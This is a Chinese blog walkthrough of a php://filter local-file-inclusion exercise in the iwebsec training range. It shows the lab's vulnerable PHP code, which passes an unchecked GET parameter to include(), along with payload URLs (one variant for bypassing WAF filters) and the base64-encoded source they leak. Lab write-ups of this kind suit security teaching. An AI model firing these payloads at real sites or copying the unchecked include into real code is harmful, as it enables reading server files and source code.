iwebsec靶场 文件包含漏洞通关笔记6-php://filter伪协议

最新推荐文章于 2023-10-07 13:10:45 发布
最新推荐文章于 2023-10-07 13:10:45 发布
阅读量359 收藏 2
点赞数 1
分类专栏: iwebsec靶场 网络安全 文章标签: php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mooyuan/article/details/128071970
版权

目录

前言

1.php://filter伪协议原理

2.php://filter伪协议利用方式

第06关 php://filter伪协议

1.打开靶场

2.源码分析

3.伪协议渗透

(1)方法1

(2)方法2

4.base64解码获取源码

前言

1.php://filter伪协议原理

php://filter可以获取指定文件源码。当它与包含函数结合时,php://filter流会被当作php文件行。如果我们对其进行编码,就可以任意文件读取。


2.php://filter伪协议利用方式

?file=php://filter/resource=xxx.php

?file=php://filter/read=convert.base64-encode/resource=xxx.php

?file=php://filter/convert.base64-encode/resource=xxx.php #可绕过过滤了操作名read的waf
 

第06关 php://filter伪协议

1.打开靶场

http://iwebsec.com:81/fi/06.php

2.源码分析

<?php

  require_once('../header.php');
  ?>
<html>
	<head>
		<title>php伪协议</title>
	</head>
	<h2>php伪协议</h2>
		<div class="alert alert-success">
			<p>/06.php?filename=php://filter/convert.base64-encode/resource=06.php </p>
		</div>
	<body>
<?php
	if(isset($_GET['filename'])){
	
    $filename  = $_GET['filename'];
    include($filename);
	}else{
		exit();
	}
	
?>

3.伪协议渗透

(1)方法1

 参数为?filename=php://filter/convert.base64-encode/resource=06.php

http://iwebsec.com:81/fi/06.php?filename=php://filter/convert.base64-encode/resource=06.php

编码的值为

PD9waHAKCiAgcmVxdWlyZV9vbmNlKCcuLi9oZWFkZXIucGhwJyk7CiAgPz4KPGh0bWw+Cgk8aGVhZD4KCQk8dGl0bGU+cGhw5Lyq5Y2P6K6uPC90aXRsZT4KCTwvaGVhZD4KCTxoMj5waHDkvKrljY/orq48L2gyPgoJCTxkaXYgY2xhc3M9ImFsZXJ0IGFsZXJ0LXN1Y2Nlc3MiPgoJCQk8cD4vMDYucGhwP2ZpbGVuYW1lPXBocDovL2ZpbHRlci9jb252ZXJ0LmJhc2U2NC1lbmNvZGUvcmVzb3VyY2U9MDYucGhwIDwvcD4KCQk8L2Rpdj4KCTxib2R5Pgo8P3BocAoJaWYoaXNzZXQoJF9HRVRbJ2ZpbGVuYW1lJ10pKXsKCQogICAgJGZpbGVuYW1lICA9ICRfR0VUWydmaWxlbmFtZSddOwogICAgaW5jbHVkZSgkZmlsZW5hbWUpOwoJfWVsc2V7CgkJZXhpdCgpOwoJfQoJCj8+Cg==

(2)方法2

06.php?filename=php://filter/read=convert.base64-encode/resource=06.php

http://iwebsec.com:81/fi/06.php?filename=php://filter/read=convert.base64-encode/resource=06.php

4.base64解码获取源码

Base64 在线编码解码 | Base64 加密解密 - Base64.us

 解码后的源码如下所示,和我们在服务器中查看到的源码一样。

<?php

  require_once('../header.php');
  ?>
<html>
	<head>
		<title>php伪协议</title>
	</head>
	<h2>php伪协议</h2>
		<div class="alert alert-success">
			<p>/06.php?filename=php://filter/convert.base64-encode/resource=06.php </p>
		</div>
	<body>
<?php
	if(isset($_GET['filename'])){
	
    $filename  = $_GET['filename'];
    include($filename);
	}else{
		exit();
	}
	
?>

mooyuan天天
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
DVWA靶场--文件上传/包含(low-high).
Polaroid2的博客
10-12 504
仅用于技术分享。
文件上传漏洞练习靶场upload-labs
07-05
1. **不受限的文件类型上传**:这类漏洞通常发生在服务器未对上传文件的类型进行严格检查时,攻击者可以上传任意类型的文件,包括可能包含恶意代码的脚本文件(如.php、.asp等)。 2. **文件名重写漏洞**:当服务器...
iwebsec靶场文件包含漏洞-php://filter伪协议
qq_56041380的博客
04-03 232
php://filter 是元封装器,设计用于数据流打开时的筛选过滤应用,对本地磁盘文件进行读写
谈一谈php://filter的妙用
beyond__devil的博客
10-19 1万+
原文地址: https://www.leavesongs.com/PENETRATION/php-filter-magic.html 这个可能是一个大牛,大家可以看看博客去,我没看过。。。 php://filterPHP中独有的协议,利用这个协议可以创造很多“妙用”,本文说几个有意思的点,剩下的大家自己下去体会。本来本文的思路我上半年就准备拿来做XDCTF2016的题目的,
php://filter伪协议(总结)
leekos的博客,分享web安全相关知识~
01-07 8884
php://filter伪协议(总结)
PHP伪协议filter详解,php://filter协议过滤器
热门推荐
wangyuxiang946的博客
06-12 1万+
PHP://filter协议 PHP filter 过滤器
PHP 伪协议:使用 php://filter 为数据流应用过滤器
两个月亮
10-07 2509
php://filter 的主要作用是提供一种机制,让您可以轻松地在数据流上应用一个或多个过滤器。convert.base64-encode 与 convert.base64-decode 是 php://filter 所支持的过滤器,使用这两个过滤器等同于使用 base64_encode() 与 base64_decode() 对数据流进行处理。在为 php://filter 指定过滤器时,可以通过 管道符 | 指定多个过滤器(过滤器列表),这些过滤器将按照 从左至右 的顺序 依次 对数据流进行处理。
vuInhub靶场实战系列-prime:2
最新发布
06-08
vuInhub靶场实战系列-prime:2
phpMyAdmin 4.0.1--4.2.12 本地文件包含漏洞(CVE-2014-8959)-附件资源
03-05
phpMyAdmin 4.0.1--4.2.12 本地文件包含漏洞(CVE-2014-8959)-附件资源
iwebsec靶场 文件包含漏洞通关笔记7-php://input伪协议
mooyuan的博客
09-14 351
php://input可以访问请求的原始数据的只读流,将post请求的数据当作php代码执行,如果存在文件包含漏洞,可将php://input作为文件名传入,同时在post中注入设置想要注入的代码,php执行时就会将post的内容作为php代码执行。
伪协议filter_代码审计php伪协议利用
weixin_39613089的博客
01-13 804
“作者:小刚一位苦于信息安全的萌新小白帽,记得本实验仅用于信息防御教学,切勿用于它用途”什么是伪协议PHP 带有很多内置URL 风格的封装协议,可用于类似 fopen()、 copy()、 file_exists() 和 filesize() 的文件系统函数。file://访问本地文件系统http://访问 HTTP(s) 网址ftp://访问 FTP(s) URLsphp://访...
php:filter伪协议之[BSidesCF 2020]Had a bad day
qq_58970968的博客
07-21 202
但是只要是含有woofers的字符串就会是另外的语法错误,猜测后面试有一个字符串匹配函数;phpfilter//read=convert.base64-encode/resource=文件名;他已经把.php后缀加上了,意思是执行的是参数的PHP文件,那么就很可能是flag;也可以index得到源码;...
iwebsec靶场 文件包含漏洞通关笔记8-php://input伪协议利用
mooyuan的博客
09-14 621
php://input可以访问请求的原始数据的只读流,将post请求的数据当作php代码执行,如果存在文件包含漏洞,可将php://input作为文件名传入,同时在post中注入设置想要注入的代码,php执行时就会将post的内容作为php代码执行。
php://filter/
小龙在线
09-07 736
php://filterphp中独有的一个协议,可以作为一个中间流来处理其他流,可以进行任意文件的读取;根据名字filter可以很容易想到这个协议可以用来过滤一些东西。
php://filter
2202_75317918的博客
04-12 3119
php://filter
PHP Filter 伪协议
weixin_55710577的博客
06-05 2088
php filter 伪协议
PHP 过滤器(Filter
long0801的博客
08-08 463
PHP 过滤器用于验证和过滤来自非安全来源的数据,比如用户的输入。 什么是 PHP 过滤器? PHP 过滤器用于验证和过滤来自非安全来源的数据。 验证和过滤用户输入或自定义数据是任何 Web 应用程序的重要组成部分。 设计 PHP 的过滤器扩展的目的是使数据过滤更轻松快捷。 为什么使用过滤器? 几乎所有 web 应用程序都依赖外部的输入。这些数据通常来自用户或其他应用程序(
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

mooyuan天天

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值